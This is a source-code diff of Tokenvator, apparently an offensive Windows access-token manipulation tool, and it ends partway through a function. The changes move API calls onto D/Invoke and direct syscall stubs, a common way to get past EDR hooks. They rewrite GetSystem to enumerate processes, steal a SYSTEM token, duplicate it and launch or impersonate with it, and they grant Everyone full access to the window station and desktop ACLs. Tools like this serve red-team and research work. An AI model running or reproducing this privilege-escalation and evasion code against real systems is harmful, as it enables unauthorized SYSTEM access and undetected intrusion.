@@ -145,6 +145,7 @@ private static void _ClearDesktopACL(IntPtr hToken)
         {
             using (DesktopACL dA = new DesktopACL(hToken))
             {
+                dA.LoadModule();
                 dA.OpenWindow();
                 dA.OpenDesktop();
             }
@@ -217,7 +218,7 @@ private static void _FindUserProcesses(CommandLineParsing cLP)
                 Console.WriteLine("[-] Username not specified");
                 return;
             }
-            Dictionary<uint, string> processes = UserSessions.EnumerateUserProcesses(false, user);
+            Dictionary<uint, string> processes = UserSessions.EnumerateUserProcesses(user);
             Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
             Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
             foreach (uint pid in processes.Keys)
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index cdc295c..00330a0 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -1,5 +1,9 @@
 using System;
 using System.Collections.Generic;
+using System.Diagnostics;
+using System.Runtime.ExceptionServices;
+using System.Runtime.InteropServices;
+using System.Security;
 using System.Security.Principal;
 
 using Tokenvator.Resources;
@@ -10,11 +14,6 @@
 
 using DInvoke.DynamicInvoke;
 
-using System.Runtime.InteropServices;
-using System.Diagnostics;
-using System.Runtime.ExceptionServices;
-using System.Security;
-
 namespace Tokenvator.Plugins.AccessTokens
 {
     using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
@@ -34,6 +33,8 @@ class AccessTokens : IDisposable
 
         internal delegate bool Create(IntPtr phNewToken, string newProcess, string arguments);
 
+        private readonly IntPtr hNtOpenProcess;
+        private readonly IntPtr hNtOpenProcessToken;
         private readonly IntPtr hNtClose;
 
         /// <summary>
@@ -49,6 +50,8 @@ public AccessTokens(IntPtr currentProcessToken)
             hWorkingToken = new IntPtr();
             hWorkingThreadToken = new IntPtr();
 
+            hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
+            hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
             hNtClose = Generic.GetSyscallStub("NtClose");
         }
 
@@ -112,6 +115,8 @@ public IntPtr GetWorkingToken()
         ////////////////////////////////////////////////////////////////////////////////
         // Move to access tokens - have Impersonate user use this
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLevel)
         {
             IntPtr hNtDuplicateToken = Generic.GetSyscallStub("NtDuplicateToken");
@@ -177,14 +182,12 @@ public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLeve
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
-        public virtual bool OpenProcessToken(int processId)
+        public virtual bool OpenProcessToken(int processId, bool showOutput = true)
         {
             ////////////////////////////////////////////////////////////////////////////////
             // Open a limited handle to the process via a syscall stub
             // IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)processId);
-            ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
+            ////////////////////////////////////////////////////////////////////////////////    
             MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
 
             IntPtr hProcess = new IntPtr();
@@ -206,17 +209,22 @@ public virtual bool OpenProcessToken(int processId)
 
             if (0 != ntRetVal)
             {
-                Misc.GetNtError("NtOpenProcess", ntRetVal);
+                if (showOutput)
+                {
+                    Misc.GetNtError("NtOpenProcess", ntRetVal);
+                }
                 return false;
             }
-            Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
+
+            if (showOutput)
+            {
+                Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
+            }
 
             ////////////////////////////////////////////////////////////////////////////////
             // Open a handle to the process token
             // bool retVal = kernel32.OpenProcessToken(hProcess, (ulong)Winnt.TOKEN_ALL_ACCESS, out hExistingToken)
-            ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
+            ////////////////////////////////////////////////////////////////////////////////       
             MonkeyWorks.ntdll.NtOpenProcessToken fSyscallNtOpenProcessToken = (MonkeyWorks.ntdll.NtOpenProcessToken)Marshal.GetDelegateForFunctionPointer(hNtOpenProcessToken, typeof(MonkeyWorks.ntdll.NtOpenProcessToken));
 
             try
@@ -232,7 +240,10 @@ public virtual bool OpenProcessToken(int processId)
 
             if (0 != ntRetVal)
             {
-                Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                if (showOutput)
+                {
+                    Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                }
 
                 try
                 {
@@ -247,13 +258,21 @@ public virtual bool OpenProcessToken(int processId)
 
                 if (0 != ntRetVal)
                 {
-                    Console.WriteLine(" [-] Unable to Open Process Token");
-                    Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                    if (showOutput)
+                    {
+                        Console.WriteLine(" [-] Unable to Open Process Token");
+                        Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                    }
                     CloseHandle(hProcess);
                     return false;
                 }
             }
-            Console.WriteLine("[*] Recieved Token Handle 0x{0}", hExistingToken.ToString("X4"));
+
+            if (showOutput)
+            {
+                Console.WriteLine("[*] Recieved Token Handle 0x{0}", hExistingToken.ToString("X4"));
+            }
+
             CloseHandle(hProcess);
             return true;
         }
@@ -266,6 +285,8 @@ public virtual bool OpenProcessToken(int processId)
         /// <param name="processId"></param>
         /// <returns>Returns true if successful, returns false if an error or exception was generated</returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public bool ListThreads(int processId)
         {
             if (0 == processId)
@@ -281,7 +302,18 @@ public bool ListThreads(int processId)
             IntPtr hKernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
             IntPtr hCreateToolhelp32Snapshot = Generic.GetExportAddress(hKernel32, "CreateToolhelp32Snapshot");
             MonkeyWorks.kernel32.CreateToolhelp32Snapshot fCreateToolhelp32Snapshot = (MonkeyWorks.kernel32.CreateToolhelp32Snapshot)Marshal.GetDelegateForFunctionPointer(hCreateToolhelp32Snapshot, typeof(MonkeyWorks.kernel32.CreateToolhelp32Snapshot));
-            IntPtr hSnapshot = fCreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
+            
+            IntPtr hSnapshot;
+            try
+            {
+                hSnapshot = fCreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] OpenWindowStationW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             if (IntPtr.Zero == hSnapshot)
             {
@@ -540,8 +572,8 @@ protected bool CloseHandle(IntPtr handle)
 
             if (0 != ntRetVal)
             {
-                Misc.GetNtError("NtClose", ntRetVal);
-                Console.WriteLine("[-] {0}", (new StackTrace()).GetFrame(1).GetMethod().Name);
+                //Misc.GetNtError("NtClose", ntRetVal);
+                //Console.WriteLine("[-] {0}", (new StackTrace()).GetFrame(1).GetMethod().Name);
                 return false;
             }
             return true;
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 1190524..b9ca7df 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -290,6 +290,7 @@ ref tokenSource
 
             using (DesktopACL desktop = new DesktopACL(hWorkingToken))
             {
+                desktop.LoadModule();
                 desktop.OpenDesktop();
                 desktop.OpenWindow();
             }
@@ -397,6 +398,7 @@ ref ti.tokenSource
 
             using (DesktopACL desktop = new DesktopACL(hWorkingToken))
             {
+                desktop.LoadModule();
                 desktop.OpenDesktop();
                 desktop.OpenWindow();
             }
@@ -1015,16 +1017,9 @@ public void LogonUser(string domain, string username, string password, Winbase.L
             }
             Console.WriteLine("[+] Logged On {0}", username.TrimEnd());
 
-            if (Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE == logonType)
-            {
-                if (!_SetTokenSessionId(Process.GetCurrentProcess().SessionId))
-                {
-                    Console.WriteLine(" [-] Unable to Update Token Session ID, this is likely to cause problems with this token");
-                }
-            }
-
             using (DesktopACL da = new DesktopACL(hWorkingToken))
             {
+                da.LoadModule();
                 da.OpenWindow();
                 da.OpenDesktop();
             }
@@ -1110,18 +1105,9 @@ public void LogonUser(string domain, string username, string password, string gr
             }
             Console.WriteLine("[+] Logged On {0}", username.TrimEnd());
 
-            if (Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE == logonType)
-            {
-                //Is this needed?
-                SetWorkingTokenToRemote();
-                if (!_SetTokenSessionId(Process.GetCurrentProcess().SessionId))
-                {
-                    Console.WriteLine(" [-] Unable to Update Token Session ID, this is likely to cause problems with this token");
-                }
-            }
-
             using (DesktopACL da = new DesktopACL(hWorkingToken))
             {
+                da.LoadModule();
                 da.OpenWindow();
                 da.OpenDesktop();
             }
@@ -1511,7 +1497,7 @@ public static bool InitializeSid(string sddl, ref IntPtr psid)
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Updates the token session ID to the specified session
-        /// Does this even work?
+        /// Doesn't work on PrimaryTokens
         /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
         /// </summary>
         /// <param name="sessionId"></param>
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index 4c6b925..67d8aff 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -322,7 +322,7 @@ public void GetTokenSource()
         /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenUser, IntPtr.Zero, 0, out returnLength);
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        public void GetTokenUser()
+        public string GetTokenUser(bool showOutput = true)
         {
             hTokenUser = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenUser);
             try
@@ -333,14 +333,20 @@ public void GetTokenUser()
             {
                 Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
-                return;
+                return string.Empty;
             }
 
-            Console.WriteLine("[+] User: ");
+            if (showOutput)
+            {
+                Console.WriteLine("[+] User: ");
+            }
             string sid, account;
             ReadSidAndName(tokenUser.User.Sid, out sid, out account);
-            Console.WriteLine("{0,-50} {1}", sid, account);
-            return;
+            if (showOutput)
+            {
+                Console.WriteLine("{0,-50} {1}", sid, account);
+            }
+            return account;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 0de6d0f..22facf0 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -12,6 +12,7 @@
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
+using System.Diagnostics;
 //using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
@@ -58,6 +59,7 @@ public override void Dispose()
         /// <summary>
         /// Starts a process with a duplicated SYSTEM Token
         /// No conversions required
+        /// Removed references to UserSessions
         /// </summary>
         /// <returns>Returns true if process was successfully started</returns>
         ////////////////////////////////////////////////////////////////////////////////
@@ -69,7 +71,31 @@ public bool GetSystem(string newProcess)
                 NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
 
                 Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
-                processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
+                using (TokenInformation ti = new TokenInformation(IntPtr.Zero))
+                {
+                    foreach (Process p in Process.GetProcesses())
+                    {
+                        ti.OpenProcessToken(p.Id, false);
+                        ti.SetWorkingTokenToRemote();
+                        string userName = ti.GetTokenUser(false);
+                        if (userName.Contains(systemAccount.ToString(), StringComparison.OrdinalIgnoreCase))
+                        {
+                            hExistingToken = ti.GetWorkingToken();
+
+                            SetWorkingTokenToRemote();
+                            if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
+                            {
+                                continue;
+                            }
+
+                            SetWorkingTokenToNewToken();
+                            if (StartProcessAsUser(newProcess))
+                            {
+                                return true;
+                            }
+                        }
+                    }
+                }
             }
             catch (Exception ex)
             {
@@ -77,25 +103,6 @@ public bool GetSystem(string newProcess)
                 return false;
             }
 
-            foreach (uint process in processes.Keys)
-            {
-                if (!OpenProcessToken((int)process))
-                {
-                    continue;
-                }
-
-                SetWorkingTokenToRemote();
-
-                if (DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
-                {
-                    SetWorkingTokenToNewToken();
-                    if (StartProcessAsUser(newProcess))
-                    {
-                        return true;
-                    }
-                }
-            }
-
             Misc.GetWin32Error("GetSystem");
             return false;
         }
@@ -115,7 +122,25 @@ public bool GetSystem()
                 NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
 
                 Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
-                processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
+                using (TokenInformation ti = new TokenInformation(IntPtr.Zero))
+                {
+                    foreach (Process p in Process.GetProcesses())
+                    {
+                        ti.OpenProcessToken(p.Id, false);
+                        ti.SetWorkingTokenToRemote();
+                        string userName = ti.GetTokenUser(false);
+                        if (userName.Contains(systemAccount.ToString(), StringComparison.OrdinalIgnoreCase))
+                        {
+                            hExistingToken = ti.GetWorkingToken();
+                            SetWorkingTokenToRemote();
+
+                            if (ImpersonateUser())
+                            {
+                                return true;
+                            }
+                        }
+                    }
+                }
             }
             catch (Exception ex)
             {
@@ -123,20 +148,6 @@ public bool GetSystem()
                 return false;
             }
 
-            foreach (uint process in processes.Keys)
-            {
-                if (!OpenProcessToken((int)process))
-                {
-                     continue;
-                }
-
-                SetWorkingTokenToRemote();
-
-                if (ImpersonateUser())
-                {
-                    return true;
-                }
-            }
             return false;
         }
 
diff --git a/Tokenvator/Plugins/Enumeration/DesktopACL.cs b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
index 3f0b2e0..861fa03 100644
--- a/Tokenvator/Plugins/Enumeration/DesktopACL.cs
+++ b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
@@ -1,17 +1,23 @@
 using System;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
+
+using DInvoke.DynamicInvoke;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 using Tokenvator.Plugins.AccessTokens;
 using Tokenvator.Resources;
 
 namespace Tokenvator.Plugins.Enumeration
 {
-    class DesktopACL : IDisposable
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
+    sealed class DesktopACL : IDisposable
     {
-        private const uint SECURITY_MAX_SID_SIZE = 68;
+        private bool disposed = false;
 
         private IntPtr ptrWinSta0 = IntPtr.Zero;
         private IntPtr pSid = IntPtr.Zero;
@@ -19,6 +25,9 @@ class DesktopACL : IDisposable
 
         private IntPtr hToken;
 
+        private IntPtr huser32 = IntPtr.Zero;
+        private IntPtr hadvapi32 = IntPtr.Zero;
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Default Constructor
@@ -32,13 +41,92 @@ internal DesktopACL(IntPtr hToken)
             this.hToken = hToken;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Default destructor, calls Disposed if not previously disposed
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        ~DesktopACL()
+        {
+            if (!disposed)
+            {
+                Dispose();
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// IDisposable close handles
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        public void Dispose()
+        {
+            if (IntPtr.Zero != ptrWinSta0)
+            {
+                Marshal.FreeHGlobal(ptrWinSta0);
+            }
+
+            if (IntPtr.Zero != pSid)
+            {
+                Marshal.FreeHGlobal(pSid);
+            }
+
+            if (IntPtr.Zero != ppSecurityDescriptor)
+            {
+                IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+                IntPtr hLocalFree = Generic.GetExportAddress(hkernel32, "LocalFree");
+                MonkeyWorks.kernel32.LocalFree fLocalFree = (MonkeyWorks.kernel32.LocalFree)Marshal.GetDelegateForFunctionPointer(hLocalFree, typeof(MonkeyWorks.kernel32.LocalFree));
+                try
+                {
+                    fLocalFree(ppSecurityDescriptor);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] LocalFree Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                }
+            }
+
+            disposed = true;
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Loads the user32.dll Libary
+        /// huser32 = kernel32.LoadLibrary("user32.dll");
+        /// Converted to D/Invoke GetPebLdrModuleEntry/LoadModuleFromDisk
+        /// </summary>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        internal bool LoadModule()
+        {
+            huser32 = Generic.GetPebLdrModuleEntry("user32.dll");
+            if (IntPtr.Zero == huser32)
+            {
+                huser32 = Generic.LoadModuleFromDisk("user32.dll");
+                if (IntPtr.Zero == huser32)
+                {
+                    Console.WriteLine("Unable to load user32.dll");
+                    return false;
+                }
+            }
+
+            hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            return true;
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Opens a handle to the window station
-        /// 
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        internal void OpenWindow()
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        internal bool OpenWindow()
         {
             using (TokenInformation ti = new TokenInformation(hToken))
             {
@@ -46,7 +134,7 @@ internal void OpenWindow()
                 if (!ti.CheckTokenPrivilege(Winnt.SE_SECURITY_NAME))
                 {
                     Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_SECURITY_NAME);
-                    return;
+                    return false;
                 }
                 else
                 {
@@ -54,100 +142,197 @@ internal void OpenWindow()
                 }
             }
 
-            IntPtr hWinStation = user32.OpenWindowStationW(
-                ptrWinSta0, 
-                false,
-                Winuser.WindowStationSecurity.ACCESS_SYSTEM_SECURITY
-                | Winuser.WindowStationSecurity.READ_CONTROL
-                | Winuser.WindowStationSecurity.WRITE_DAC
-            );
+            ////////////////////////////////////////////////////////////////////////////////
+            // IntPtr hWinStation = user32.OpenWindowStationW("ptrWinSta0", false, Winuser.WindowStationSecurity.ACCESS_SYSTEM_SECURITY | Winuser.WindowStationSecurity.READ_CONTROL | Winuser.WindowStationSecurity.WRITE_DAC);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hOpenWindowStationW = Generic.GetExportAddress(huser32, "OpenWindowStationW");
+            MonkeyWorks.user32.OpenWindowStationW fOpenWindowStationW = (MonkeyWorks.user32.OpenWindowStationW)Marshal.GetDelegateForFunctionPointer(hOpenWindowStationW, typeof(MonkeyWorks.user32.OpenWindowStationW));
+
+            IntPtr hWinStation;
+
+            try
+            {
+                hWinStation = fOpenWindowStationW(
+                    ptrWinSta0,
+                    false,
+                    Winuser.WindowStationSecurity.ACCESS_SYSTEM_SECURITY
+                    | Winuser.WindowStationSecurity.READ_CONTROL
+                    | Winuser.WindowStationSecurity.WRITE_DAC
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] OpenWindowStationW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             if (IntPtr.Zero == hWinStation)
             {
                 Misc.GetWin32Error("OpenWindowStationW");
-                return;
+                return false;
             }
             Console.WriteLine("[+] hWinSta0 : 0x{0}", hWinStation.ToString("X4"));
 
             _SetDACL(hWinStation);
+            return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Opens a handle to the desktop
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        internal void OpenDesktop()
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        internal bool OpenDesktop()
         {
-            IntPtr hDesktop = user32.OpenDesktopA(
-                "default", 0, false, 
-                Winuser.DesktopSecurity.GENERIC_ALL 
-                | Winuser.DesktopSecurity.WRITE_DAC);
+            ////////////////////////////////////////////////////////////////////////////////
+            // IntPtr hWinStation = user32.OpenWindowStationW("ptrWinSta0", false, Winuser.WindowStationSecurity.ACCESS_SYSTEM_SECURITY | Winuser.WindowStationSecurity.READ_CONTROL | Winuser.WindowStationSecurity.WRITE_DAC);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hOpenDesktopW = Generic.GetExportAddress(huser32, "OpenDesktopW");
+            MonkeyWorks.user32.OpenDesktopW fOpenDesktopW = (MonkeyWorks.user32.OpenDesktopW)Marshal.GetDelegateForFunctionPointer(hOpenDesktopW, typeof(MonkeyWorks.user32.OpenDesktopW));
+
+            IntPtr hDesktop;
+            try
+            {
+                hDesktop = fOpenDesktopW(
+                    "default", 0, false,
+                    Winuser.DesktopSecurity.GENERIC_ALL
+                    | Winuser.DesktopSecurity.WRITE_DAC
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] OpenDesktopW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             if (IntPtr.Zero == hDesktop)
             {
                 Misc.GetWin32Error("OpenDesktopW");
-                return;
+                return false;
             }
             Console.WriteLine("[+] hDesktop : 0x{0}", hDesktop.ToString("X4"));
 
             _SetDACL(hDesktop);
+            return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Updates the DACL on the object passed in to Everyone
+        /// Converted to D/Invoke GetExportAddress
         /// </summary>
+        /// <returns></returns>
         /// <param name="handle"></param>
-        private void _SetDACL(IntPtr handle)
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private bool _SetDACL(IntPtr handle)
         {
             ////////////////////////////////////////////////////////////////////////////////
-            //
+            //advapi32.GetSecurityInfo(handle, Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT, Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION, ref ppsidOwner, ref ppsidGroup, ref ppDacl, ref ppSacl, ref ppSecurityDescriptor);
             ////////////////////////////////////////////////////////////////////////////////
+            #region GetSecurityInfo
+            IntPtr hGetSecurityInfo = Generic.GetExportAddress(hadvapi32, "GetSecurityInfo");
+            MonkeyWorks.advapi32.GetSecurityInfo fGetSecurityInfo = (MonkeyWorks.advapi32.GetSecurityInfo)Marshal.GetDelegateForFunctionPointer(hGetSecurityInfo, typeof(MonkeyWorks.advapi32.GetSecurityInfo));
+
             IntPtr ppsidOwner, ppsidGroup, ppDacl, ppSacl;
             ppsidOwner = ppsidGroup = ppDacl = ppSacl = IntPtr.Zero;
-            uint status = advapi32.GetSecurityInfo(
-                handle,
-                Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
-                Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
-                ref ppsidOwner, ref ppsidGroup, ref ppDacl, ref ppSacl, ref ppSecurityDescriptor
-            );
+
+            uint status;
+            try
+            { 
+                status = fGetSecurityInfo(
+                    handle,
+                    Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
+                    Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
+                    ref ppsidOwner, ref ppsidGroup, ref ppDacl, ref ppSacl, ref ppSecurityDescriptor
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] GetSecurityInfo Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             if (0 != status)
             {
                 Console.WriteLine(status);
                 Misc.GetWin32Error("GetSecurityInfo");
-                return;
+                return false;
             }
             
             if (IntPtr.Zero == ppDacl)
             {
                 Misc.GetWin32Error("ppDacl");
-                return;
+                return false;
             }
+
             Console.WriteLine(" [+] Recieved DACL : 0x{0}", ppDacl.ToString("X4"));
+            #endregion
 
             ////////////////////////////////////////////////////////////////////////////////
-            // 
+            // advapi32.CreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, IntPtr.Zero, ref size);
+            // advapi32.CreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, pSid, ref size)
             ////////////////////////////////////////////////////////////////////////////////
+            #region CreateWellKnownSid
+            IntPtr hCreateWellKnownSid = Generic.GetExportAddress(hadvapi32, "CreateWellKnownSid");
+            MonkeyWorks.advapi32.CreateWellKnownSid fCreateWellKnownSid = (MonkeyWorks.advapi32.CreateWellKnownSid)Marshal.GetDelegateForFunctionPointer(hCreateWellKnownSid, typeof(MonkeyWorks.advapi32.CreateWellKnownSid));
+
             uint size = 0;
-            advapi32.CreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, IntPtr.Zero, ref size);
+            try
+            { 
+                fCreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, IntPtr.Zero, ref size);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] CreateWellKnownSid Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
             if (0 == size)
             {
                 Misc.GetWin32Error("CreateWellKnownSid - Pass 1");
-                return;
+                return false;
             }
             Console.WriteLine(" [+] Create Everyone Sid - Pass 1 : 0x{0}", size.ToString("X4"));
             pSid = Marshal.AllocHGlobal((int)size);
 
-            if (!advapi32.CreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, pSid, ref size))
+            bool retVal = false;
+            try
+            {
+                retVal = fCreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, pSid, ref size);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] CreateWellKnownSid Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
+            if (!retVal)
             {
                 Misc.GetWin32Error("CreateWellKnownSid - Pass 2");
-                return;
+                return false;
             }
             Console.WriteLine(" [+] Create Everyone Sid - Pass 2 : 0x{0}", pSid.ToString("X4"));
+            #endregion
 
             ////////////////////////////////////////////////////////////////////////////////
-            Accctrl._TRUSTEE_A trustee = new Accctrl._TRUSTEE_A
+            // advapi32.SetEntriesInAclW(1, ref explicitAccess, ppDacl, ref newAcl);
+            ////////////////////////////////////////////////////////////////////////////////
+            #region SetEntriesInAclW
+            IntPtr hSetEntriesInAclW = Generic.GetExportAddress(hadvapi32, "SetEntriesInAclW");
+            MonkeyWorks.advapi32.SetEntriesInAclW fSetEntriesInAclW = (MonkeyWorks.advapi32.SetEntriesInAclW)Marshal.GetDelegateForFunctionPointer(hSetEntriesInAclW, typeof(MonkeyWorks.advapi32.SetEntriesInAclW));
+
+            Accctrl._TRUSTEE_W trustee = new Accctrl._TRUSTEE_W
             {
                 pMultipleTrustee = IntPtr.Zero,
                 MultipleTrusteeOperation = Accctrl._MULTIPLE_TRUSTEE_OPERATION.NO_MULTIPLE_TRUSTEE,
@@ -156,48 +341,80 @@ private void _SetDACL(IntPtr handle)
                 ptstrName = pSid
             };
 
-            Accctrl._EXPLICIT_ACCESS_A explicitAccess = new Accctrl._EXPLICIT_ACCESS_A
+            Accctrl._EXPLICIT_ACCESS_W explicitAccess = new Accctrl._EXPLICIT_ACCESS_W
             {
-                grfAccessPermissions = 0xf03ff,
+                grfAccessPermissions = Winuser.WindowStationSecurity.WINSTA_ALL_ACCESS,//0xf03ff,
                 grfAccessMode = Accctrl._ACCESS_MODE.GRANT_ACCESS,
-                grfInheritance = 1,
+                grfInheritance = Accctrl.Inheritance.SUB_OBJECTS_ONLY_INHERIT, // 1,
                 Trustee = trustee
             };
 
             IntPtr newAcl = new IntPtr();
-            status = advapi32.SetEntriesInAclA(1, ref explicitAccess, ppDacl, ref newAcl);
+
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSetEntriesInAclW(1, ref explicitAccess, ppDacl, ref newAcl);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] SetEntriesInAclW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             if (0 != status)
             {
                 Console.WriteLine(status);
                 Misc.GetWin32Error("SetEntriesInAclW");
-                return;
+                return false;
             }
            
             if (IntPtr.Zero == newAcl)
             {
                 Misc.GetWin32Error("newAcl");
-                return;
+                return false;
             }
